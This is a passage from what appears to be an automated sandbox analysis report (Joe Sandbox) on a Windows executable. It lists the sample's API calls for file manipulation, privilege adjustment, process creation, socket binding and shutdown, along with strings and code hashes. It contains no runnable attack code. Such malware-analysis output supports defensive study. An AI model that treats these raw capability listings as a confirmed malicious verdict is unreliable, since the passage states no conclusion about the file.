                                                                                          • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
                                                                                          • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                                                          • CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
                                                                                          • CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
                                                                                          • SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
                                                                                          • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                                                                          • String ID: $default$winsta0
                                                                                          • API String ID: 2173856841-1027155976
                                                                                          APIs
                                                                                            • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\XhAQ0Rk63O.exe,?,C:\Users\user\Desktop\XhAQ0Rk63O.exe,004A8E80,C:\Users\user\Desktop\XhAQ0Rk63O.exe,0040F3D2), ref: 0040FFCA
                                                                                            • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
                                                                                            • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
                                                                                            • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
                                                                                            • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                          • _wcscat.LIBCMT ref: 0044BD96
                                                                                          • _wcscat.LIBCMT ref: 0044BDBF
                                                                                          • __wsplitpath.LIBCMT ref: 0044BDEC
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                                                                                          • _wcscpy.LIBCMT ref: 0044BE73
                                                                                          • _wcscat.LIBCMT ref: 0044BE85
                                                                                          • _wcscat.LIBCMT ref: 0044BE97
                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                                                                                          • DeleteFileW.KERNEL32(?), ref: 0044BED5
                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BEF5
                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
                                                                                          • DeleteFileW.KERNEL32(?), ref: 0044BF17
                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
                                                                                          • FindClose.KERNEL32(00000000), ref: 0044BF35
                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BF51
                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                                                                                          • FindClose.KERNEL32(00000000), ref: 0044BF7E
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                          • String ID: \*.*
                                                                                          • API String ID: 2188072990-1173974218
                                                                                          APIs
                                                                                          • __invoke_watson.LIBCMT ref: 004203A4
                                                                                            • Part of subcall function 00417D93: _memset.LIBCMT ref: 00417DBB
                                                                                            • Part of subcall function 00417D93: IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00417E6F
                                                                                            • Part of subcall function 00417D93: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 00417E79
                                                                                            • Part of subcall function 00417D93: UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 00417E86
                                                                                            • Part of subcall function 00417D93: GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00417EA1
                                                                                            • Part of subcall function 00417D93: TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00417EA8
                                                                                          • __get_daylight.LIBCMT ref: 004203B0
                                                                                          • __invoke_watson.LIBCMT ref: 004203BF
                                                                                          • __get_daylight.LIBCMT ref: 004203CB
                                                                                          • __invoke_watson.LIBCMT ref: 004203DA
                                                                                          • ____lc_codepage_func.LIBCMT ref: 004203E2
                                                                                          • _strlen.LIBCMT ref: 00420442
                                                                                          • __malloc_crt.LIBCMT ref: 00420449
                                                                                          • _strlen.LIBCMT ref: 0042045F
                                                                                          • _strcpy_s.LIBCMT ref: 0042046D
                                                                                          • __invoke_watson.LIBCMT ref: 00420482
                                                                                          • GetTimeZoneInformation.KERNEL32(00496C28), ref: 004204AA
                                                                                          • WideCharToMultiByte.KERNEL32(?,?,00496C2C,?,?,0000003F,?,?), ref: 00420528
                                                                                          • WideCharToMultiByte.KERNEL32(?,?,00496C80,000000FF,?,0000003F,?,?,?,00496C2C,?,?,0000003F,?,?), ref: 0042055C
                                                                                            • Part of subcall function 00413A88: __lock.LIBCMT ref: 00413AA6
                                                                                            • Part of subcall function 00413A88: ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                                            • Part of subcall function 00413A88: ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                                            • Part of subcall function 00413A88: RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                            • Part of subcall function 00413A88: GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                          • __invoke_watson.LIBCMT ref: 004205CC
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: __invoke_watson$ByteCharExceptionFilterMultiProcessUnhandledWide__get_daylight_strlen$CurrentDebuggerErrorFreeHeapInformationLastPresentTerminateTimeZone____lc_codepage_func___sbh_find_block___sbh_free_block__lock__malloc_crt_memset_strcpy_s
                                                                                          • String ID: S\
                                                                                          • API String ID: 4084823496-393906132
                                                                                          APIs
                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                                                                                          • __swprintf.LIBCMT ref: 00434D91
                                                                                          • _wcslen.LIBCMT ref: 00434D9B
                                                                                          • _wcslen.LIBCMT ref: 00434DB0
                                                                                          • _wcslen.LIBCMT ref: 00434DC5
                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                                                                                          • _memset.LIBCMT ref: 00434E27
                                                                                          • _wcslen.LIBCMT ref: 00434E3C
                                                                                          • _wcsncpy.LIBCMT ref: 00434E6F
                                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                          • String ID: :$\$\??\%s
                                                                                          • API String ID: 302090198-3457252023
                                                                                          APIs
                                                                                            • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                                                                          • GetLastError.KERNEL32 ref: 004644B4
                                                                                          • GetCurrentThread.KERNEL32 ref: 004644C8
                                                                                          • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                                                                          Strings
Similarity
• API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
• String ID: SeDebugPrivilege
• API String ID: 1312810259-2896544425
• Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
• Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
• Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
• __wsplitpath.LIBCMT ref: 004038B2
  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
• _wcscpy.LIBCMT ref: 004038C7
• _wcscat.LIBCMT ref: 004038DC
• SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
  • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
  • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
• _wcscpy.LIBCMT ref: 004039C2
• _wcslen.LIBCMT ref: 00403A53
• _wcslen.LIBCMT ref: 00403AAA
Strings
• _, xrefs: 00403B48
• #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
• Error opening the file, xrefs: 0042B8AC
• Unterminated string, xrefs: 0042B9BA
Similarity
• API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
• API String ID: 4115725249-188983378
• Opcode ID: 03e6ea20781e53ba093b2e4e1cf17e7e885813b4a055a64ca381d3f5bd1a9c3d
• Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
• Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00434C12
• GetFileAttributesW.KERNEL32(?), ref: 00434C4F
• SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
• FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
• FindClose.KERNEL32(00000000), ref: 00434C88
• FindClose.KERNEL32(00000000), ref: 00434C9C
• FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
• SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
• SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
• FindClose.KERNEL32(00000000), ref: 00434D35
• FindClose.KERNEL32(00000000), ref: 00434D43
Strings
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
• Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
• Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
• Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
APIs
Strings
Similarity
• API ID: Timetime$Sleep
• String ID: BUTTON
• API String ID: 4176159691-3405671355
• Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
• Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
• Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
APIs
  • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
  • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
  • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
  • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
• GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
• _memset.LIBCMT ref: 00445E61
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
• GetLengthSid.ADVAPI32(?), ref: 00445E92
• GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
• GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
• GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
• CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
• SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
Similarity
• API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
• String ID:
• API String ID: 3490752873-0
• Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
• Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
• Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
APIs
• OleInitialize.OLE32(00000000), ref: 0047AA03
• CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
• CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
• _memset.LIBCMT ref: 0047AB7C
• _wcslen.LIBCMT ref: 0047AC68
• _memset.LIBCMT ref: 0047ACCD
• CoCreateInstanceEx.OLE32 ref: 0047AD06
• CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
Strings
• NULL Pointer assignment, xrefs: 0047AD84
Similarity
• API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
• String ID: NULL Pointer assignment
• API String ID: 1588287285-2785691316
• Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
• Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
• Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
• OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
• AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
• GetLastError.KERNEL32 ref: 00436504
• ExitWindowsEx.USER32(?,00000000), ref: 00436527
• InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
• SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
Strings
Similarity
• API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 2938487562-3733053543
• Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
• Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                                                                          • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                          • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                                                                          APIs
                                                                                          • __swprintf.LIBCMT ref: 00436162
                                                                                          • __swprintf.LIBCMT ref: 00436176
                                                                                            • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                                                                          • __wcsicoll.LIBCMT ref: 00436185
                                                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                                          • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                                          • LockResource.KERNEL32(?), ref: 004361FD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                                                                          • String ID:
                                                                                          • API String ID: 2406429042-0
                                                                                          • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                          • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                                                          • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                          • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                                                          APIs
                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                                          • GetLastError.KERNEL32 ref: 0045D59D
                                                                                          • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                          • API String ID: 4194297153-14809454
                                                                                          • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                          • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                                                                                          • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                          • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                                                                                          APIs
                                                                                          • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                                                                            • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                          • OleInitialize.OLE32(00000000), ref: 0047AE06
                                                                                            • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                            • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                          • _wcslen.LIBCMT ref: 0047AE18
                                                                                          • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                                                                          • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
                                                                                          • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                                                                                          • String ID: HH
                                                                                          • API String ID: 1915432386-2761332787
                                                                                          • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                          • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                                                                          • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                          • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: DEFINE$`$h$h
                                                                                          • API String ID: 0-4194577831
                                                                                          • Opcode ID: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                                                                          • Instruction ID: b1cbab3e2140d6a963e4b85c5b61650905c2e88cbb7a9c7ccaf19de07e543520
                                                                                          • Opcode Fuzzy Hash: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                                                                          • Instruction Fuzzy Hash: 9802A1715083818FE725CF29C88076BBBE2BFD5304F28896EE89587342D779D849CB56
                                                                                          APIs
                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000000), ref: 004648B0
                                                                                          • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                                                          • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648DA
                                                                                          • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                                                          • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000005,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 0046492D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$bindclosesocketsocket
                                                                                          • String ID:
                                                                                          • API String ID: 2609815416-0
                                                                                          • Opcode ID: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                          • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                                                          • Opcode Fuzzy Hash: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                          • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                                                          APIs
                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                                          • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                                          • __wsplitpath.LIBCMT ref: 004370A5
                                                                                            • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                          • _wcscat.LIBCMT ref: 004370BA
                                                                                          • __wcsicoll.LIBCMT ref: 004370C8
                                                                                          • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                          • String ID:
                                                                                          • API String ID: 2547909840-0
                                                                                          • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                          • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                                                                          • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                          • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                                                          APIs
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                                          • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                                          • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                                          • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
